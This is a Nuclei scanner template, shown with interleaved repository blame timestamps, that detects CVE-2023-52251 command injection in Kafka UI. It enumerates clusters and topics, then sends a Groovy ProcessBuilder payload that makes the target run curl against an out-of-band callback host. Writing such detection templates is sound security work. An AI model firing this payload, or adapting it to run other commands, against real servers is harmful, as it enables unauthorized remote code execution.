nuclei-templates/http/cves/2023/CVE-2023-52251.yaml

72 lines
2.0 KiB
YAML
Raw Normal View History

2024-03-14 08:49:09 +00:00
id: CVE-2023-52251
info:
2024-03-14 10:18:27 +00:00
name: Kafka UI 0.7.1 Command Injection
2024-06-25 13:19:49 +00:00
author: yhy0,iamnoooob
2024-03-14 10:18:27 +00:00
severity: high
2024-03-14 08:49:09 +00:00
description: |
2024-03-14 10:18:27 +00:00
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
2024-03-14 08:49:09 +00:00
reference:
2024-03-14 10:18:27 +00:00
- http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
2024-06-25 13:19:49 +00:00
- https://github.com/BobTheShoplifter/CVE-2023-52251-POC
2024-03-14 10:18:27 +00:00
- https://github.com/nomi-sec/PoC-in-GitHub
2024-03-14 08:49:09 +00:00
classification:
2024-03-14 10:18:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2024-03-14 08:49:09 +00:00
cvss-score: 8.8
cve-id: CVE-2023-52251
2024-03-14 10:18:27 +00:00
cwe-id: CWE-94
2024-06-25 13:19:49 +00:00
epss-score: 0.03218
epss-percentile: 0.91206
2024-03-14 10:18:27 +00:00
cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
2024-03-14 08:49:09 +00:00
metadata:
2024-03-14 10:18:27 +00:00
verified: true
2024-03-14 08:49:09 +00:00
max-request: 3
2024-03-14 10:18:27 +00:00
vendor: provectus
product: ui
framework: kafka
2024-03-14 08:49:09 +00:00
fofa-query: icon_hash="-1477045616"
2024-06-25 13:19:49 +00:00
tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm
2024-03-14 08:49:09 +00:00
http:
2024-06-25 13:19:49 +00:00
- raw:
- |
GET /api/clusters HTTP/1.1
Host: {{Hostname}}
2024-03-14 10:18:27 +00:00
2024-03-14 08:49:09 +00:00
extractors:
- type: json
2024-06-25 13:19:49 +00:00
name: cluster-name
2024-03-14 08:49:09 +00:00
internal: true
2024-06-25 13:19:49 +00:00
json:
- '.[0].name'
- raw:
- |
GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
Host: {{Hostname}}
2024-03-14 08:49:09 +00:00
2024-06-25 13:19:49 +00:00
extractors:
2024-03-14 08:49:09 +00:00
- type: json
2024-06-25 13:19:49 +00:00
name: topic-name
2024-03-14 08:49:09 +00:00
internal: true
2024-06-25 13:19:49 +00:00
json:
- '.topics[].name'
- raw:
- |
@timeout 20s
GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- 'Assigning partitions'